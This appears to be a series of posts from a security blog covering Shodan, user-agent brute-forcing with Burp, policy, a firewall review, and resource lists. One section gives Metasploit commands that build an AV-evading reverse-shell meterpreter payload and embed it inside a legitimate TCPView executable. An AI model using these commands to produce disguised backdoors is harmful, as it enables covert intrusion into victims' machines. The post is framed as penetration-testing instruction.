If you haven’t seen it all over twitter yet, achillean released the “beta” of SHODAN yesterday. It’s a search engine of basically a nmap of the internet (ports 21, 22, 23 or 80 so far).

http://shodan.surtri.com/

You can search by keyword, and/or using any of the advanced search options.

• country: 2-letter country code
• hostname: full or partial host name
• net: IP range using CIDR notation (ex: 18.7.7.0/24 )
• port: 21, 22, 23 or 80

Here is just a taste of the power this bring to the game:

Let your mind run wild. I imagine this search engine will do nothing but grow. Remember, as with any service, your searches are happening on someone else’s servers, be gentle (it’s free.. right now) and be wary, you don’t want to put too much data about a customer ;–)

Thanks go to HD Moore for the head up about the service, and Thierry Zoller for adding flame to the fire of crazy searches to try on this new service.

Idea came thanks to cktricky from: http://cktricky.blogspot.com/

A bunch of sites on the web give you different pages depending on the browser you use to view it. I know when I was a web developer compatibility was the bane of my existence, as I’m sure it still is for all the web devs out there. Well, sometimes this leads to bad coding practices, or even the old “Google Bot gets to see everything” feature. Well, I had an idea to take Burp’s Intruder and “Brute Force” any compatibility coding that a site may have. Especially if there is a restricted section of the page that you know is there, but don’t have access to.

To start off you need a list of user agents. I pulled mine from the User-Agent Switcher lists I found on the web since they are in easily parsed XML.

From: Qainsight’s UA Lists.

I downloaded: http://qainsight.net/content/binary/AgentStrings20070517.xml

There are plenty of ways to parse XML in your scripting language of choice but here is some dirty bash script that worked for me:

1

cat AgentStrings20070517.xml | grep "useragent=" | grep -v "*" | awk -F '"' '{print $4}' > useragents.txt

Next, we set up our Intruder instance:

And import useragents.txt into Intruder and kick it off.

If any of the ‘payloads’ come back with anything different, it’s definitely something to look into.

We (the security community) all know, and make fun of “Users”, and “Admins”. They are derogatory terms in our community. So much so, that they could almost be classified at curse words. (I can see the XKCD now: Security stick figure talking to IT stick figure. “You stupid A****”).

While I neither discount their “contribution” to making my day fun, I feel that a lot of people miss an even bigger threat: Policies and Procedures, or SOP (Standard Operating Procedures). Those words are virtual kryptonite to anyone in IT, more so to ‘security professionals’.

But what makes them a threat? Two thing:

1. Everyone hates them so they are rarely updated (you know.. like Windows.. stay with me)
2. Since they are rarely updated, and sometimes even those that are, are written poorly, or actually create vulnerabilities.

For example lets make all the local admin passwords something really difficult and long, and… all the same so that we can easily administer every machine. This makes it to updates go smoothly and group policy… Oh wait… we don’t have those problems anymore (or at least they aren’t based on local authentication issues).

Now, policies and documented procedures are good things. I’m not saying they aren’t. What I am saying is that when those documented procedures and policies that we blindly follow because the guy that trained me said so, just doesn’t cut it.

Admins: Challenge that policy, find out the reason why you do what they want you to do. The worst that could happen is you could learn something new. The best is that you could change your company’s security posture for the better.

Security Pros: Time to get off your A**** and update the wiki! (or the doc/site/binder) so that your predecessor, or someone new to your team can hit the ground running.

I also challenge you to look at internet policies/procedures… oh wait.. they call those features.

Disclaimer: I was given a demo license of the new free business product to break/review. No money has traded hands. This is my brutally honest opinion of the product.

I’ve played with a gambit of Astaro products, and personally I really hate UTMs, just like I do All-In-One Printer/Copier/Faxes. One thing breaks, they all do. However, Astaro’s .. before I go into my opinions of the product, or get on any soap box, here are the facts:

1. Astaro Security Gateway was free for home use already

   • (works awesome for VM demos)

2. On November 16th 2009, Astaro Security Gateway “Essential Firewall Edition” is now FREE to any business that wants to run a copy.

   • Essential Firewall Edition is basically a enterprise grade firewall w/ VPN and some reporting.

Why I like this product is not because it’s Astaro, but because it’s the bare essentials. It’s exactly what a small to mid size business needs for you to stop getting calls from your friend at 5 AM asking why the Linksys you put DD-WRT on to be slick is down.

There is no better gift you can give a business as an IT/Security guy, then the ability to see and log. Test it out, you’ll be amazed at what you see on your network.

Like I said initially, this is a brutally honest post, and I whole heartedly believe in FREE, and one tool for one job. However so far it’s been all fluff and daisies. In coming posts, I’ll show how it, and other free alternatives break, or stand up from an attack point of view.

On a site note, it works flawlessly with the iPhone ;–) – Use public wifi with no less fear, when all of your traffic is going through a VPN automagically. That’ll make the boss happy.

(This post got lost in the intertubes and it took a bit to get back, Archive.org nor Google cache had it)

I get this question all the time: “Why room362.com?” I have answered that question in a lot of ways, depending on the perceived amount of time I had to tell the story. But, on a blog you have tons of time, right? Not if you are studying the Twitter boom. Anyways, this is the semi-brief-long version that won’t bore you to death like this intro is:

It all started with a desk of multiplying pizzas…

In 29 Palms, California, there is a Marine base. I was stationed there for a couple of months during some training and one night a group of us decided to stage a LANPARTY. Easier said than done when most of the Marines in the area were only there for a short while as well and didn’t want to bring desktops or chance laptops in the sandy dessert. But we pulled it off. We had about 8-10 players at any given time and people were playing everything from Quake3, to Lightbikes 2.

And that was that, there really isn’t much excitement to be had in a dessert. However, there was one thing that the LAN party caused, an increased interest in how ‘domains’ worked in my room mate. He asked how to register a domain and I took him through the whole process, set up my dinky 1.4ghz Celeron laptop as a Windows 2003 server as a Domain Controller with Exchange 2003 installed on it (yes I know..). But he was stuck on choosing a name for the domain.

Being the impatient person that I am, I got fed up and just named it the room number that we were staying in. And so Room362.com was born. 24 hours later, Room362.com was on every single RBL list for spammers on the planet. Why? Because there was at the time a default switch that made Exchange 2003 an open relay. Learned a lot that summer. Going forward it’s just been “my domain”, my room mate sure didn’t want it since it was “totally blocked from everything”. Been here ever since. Welcome to my room.

Room362.com Logo in 2005:

In Revision 7315 of the Metasploit Framework (SVN) a new option was added to MSFENCODE. Technically you always had the ability to do the following, but it required a bit of knowledge of the inner workings of the framework.

But before I get into the new feature, lets quickly go over the standard way you use msfencode:

1
2
3
4

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 LPORT=443 R | ./msfencode -t exe -o /tmp/bob.exe       
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1) 

root@bt4:/pentest/exploits/framework3#

We just used MSFPAYLOAD to output in [R]AW format, a reverse tcp connect meterpreter payload. We then piped it into MSFENCODE, so that we could output it as a proper Windows executable (/tmp/bob.exe), encoded to avoid AV detection.

Now if you knew where it was (data/templates/template.exe) you could probably just replace the template.exe with the one you want loaded with the payload and called it a day. But then you wouldn’t get some of the tweaks that make this update awesome.

The update added the (-x) option to msfencode. This allows you to specify an executable of your choosing to sacrifice to the gods. For example: (TCPView)

1
2
3
4
5

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 LPORT=443       
R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe        
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1) 

root@bt4:/pentest/exploits/framework3#

And if everything went well, we have a nice new executable in /tmp/ called Tcpview2.exe. Want to know the magic part? Try to tell them apart:

Continuing my “Getting your fill of” series

Dave Shackleford recently posted an excellent blog entry titled “One for the n00bs”: http://daveshackleford.com/?p=277

It relates the security community to a high school cafeteria. It’s a good read and pretty dead on. I want to echo his sentiments, “I got my OWN lunch table. And you’re invited.”, I”m just an email away. I also wanted to let you know there are a lot of places where you can learn on your own, at your own pace, and without any chance of ridicule. (well, maybe a little)

In no particular order:

• Dan Guido’s Penetration Testing course at Poly U.

  • This mind blowing set of videos (16 so far) are taught by the best in the biz. People pay out the nose for the information released in these videos. Get out your pen and paper, because the from the time you press play you are going to be inundated with technical knowledge. (On the Vimeo site for each video you can even download the full thing for viewing on your i(Phone|Pod|Touch|Brain))

  • PRICE: FREE

• SecurityTube

  • A consolidation of all the security /hacking related videos posted to the net. Their database of videos is massive.

  • PRICE: FREE

• The Academy

  • Kinda like Security Tube, but these videos are all professionally done by Peter Giannoulis and crew, and are on some of the big iron security tools and appliances that you wouldn’t normally be able to get your hands on to play with. This is a great way to beef up your knowledge of a product that your potential employer is running (after you have cyber stalked them: http://www.irongeek.com/i.php?page=security/how-to-cyberstalk-potential-employers). Or you just want to find out what that Security guy from the other section installed in your rack.

  • PRICE: FREE (just have to sign up for a free account)

• Metasploit Unleashed: Mastering the Framework by Offensive Security

  • This is the official documentation for the Metasploit Framework. It’s scenario driven, so it’s really easy to follow along.

  • PRICE: FREE (Videos and other materials are available for a donation to Hackers for Charity)

And I wouldn’t be doing my duty without showing you how to get more:

• Vimeo search for Metasploit (you can even put it in your favorite feed reader): http://vimeo.com/videos/search:metasploit

• Pretty much any video site (youtube, blip.tv, viddler) plus searches for metasploit or hacking will net you a bunch of videos. You’ll have to sift through some trash, but there are definitely some nuggets out there. Vimeo just seems the most noise free at the moment.

I hope this helps you at whatever stage you think you are at since we are all n00bs to an extent.

Other “Getting your fill of” series posts:

• Getting your fill of Security

• Getting your fill of Reverse Engineering and Malware Analysis

I created a google group for the NoVA Hackers meetups (Formerly known as NoVASec Luncheons)

I have added some permissions to the group to maximize privacy options while still allowing for interaction other than me sending out BCC’d messages to everyone:

• Private Invite Only – basically to keep spam out

• Only Managers can view Member List – so those who want don’t want their email addresses seen can join and just listen for announcements and regular message traffic

• Managers and Members can invite – this allows for growth by word of mouth with little moderation ( I say little because I’ll still get emails when new users join )

If you are interested in joining please send me the email addresses you would like invited to the group to mubix@hak5.org

URL is http://groups.google.com/group/novahackers/

I will be doing all following announcements there.

I had a bet with my friend about getting #1 on the Crazy Taxi high score page (== motivation for this post).

For those who have not been introduced to it yet, it’s a Facebook/Flash/2.0 resurrection of a much older game.

Not having extreme timing skills, I quickly gave up on getting the 2,000,000 points required to make it the “normal” way: My first try was modifying the outgoing HTTP traffic using the Tamper Data plugin for Firefox (to catch the obvious ones). The Crazy Taxi Flash does actually submit your score using HTTP in clear text (IIRC they have a reflected XSS there as well), but the GET-param is only used for displaying a score – nothing is saved. By the looks of things, they seem to be RC4-encrypting the score as some sort of weak client-side anti-tamper protection, and even though singling out the request that submitted the score was no pain at a all – it actually said “submitScore” – decompiling the Flash, however, was.

At first I tried with flasm, but for some reason flasm went all bananas when confronted with the Crazy Taxi flash files, so I started sketching up a Flash / AS3 deobfuscator / decompiler with Frigolit – and then I realized that simply debugging the host process would be far the fastest way to do it. I started out with setting my score to “6661337”, but someone had “beat” it the day after. I wanted to be on top, and I didn’t want to have to “maintain” my position. I wanted the maximum score, so that made me look into matters and discover that the score was stored in a signed double (I think they use PHP ;).

Here’s a video of me “achieving” 0x7fff ffff points. A nice little thing is that if you go above 0x7ffff ffff (>=0x8000 0000), the sign will flip and your numbers will “shrink” instead of growing. Damn I would like to see the frustrated faces of all them other script kiddies when they sit at home, trying to raise their scores and getting minus values instead :–)

Hacking Crazy Taxi from Joe Pragmatk on Vimeo.

Yes, I just called everyone who works at Apple an Oompa Loompa, but I digress:

I was reading Brooke Crothers’ story on the Apple ‘gag’ order [1] and couldn’t help but think of how Apple has created an almost similar situation. Everyone wants to know what Apple is up to, can’t stop talking about it. Buzz Out Loud [2] even had people call and email asking them to see if they could do a show without mentioning Apple or the iPhone. According to Brooke’s article, people are afraid for their very jobs (pun?) even in the mentioning of Apple. What’s behind the curtains at Apple? Is Steve Jobs going to send out 5 golden Apple Tablets? Probably not, but I can’t shake the image of Steve coming out on stage to do one of his presentations with a cane and doing a fake fall to the podium.

So I pose this crucial question to you, the reader: Who plays the part of Slugworth?

[1] http://news.cnet.com/8301-13924_3-10372535-64.html?part=rss&subj=news&tag=2547-1_3-0-20

[2] http://bol.cnet.com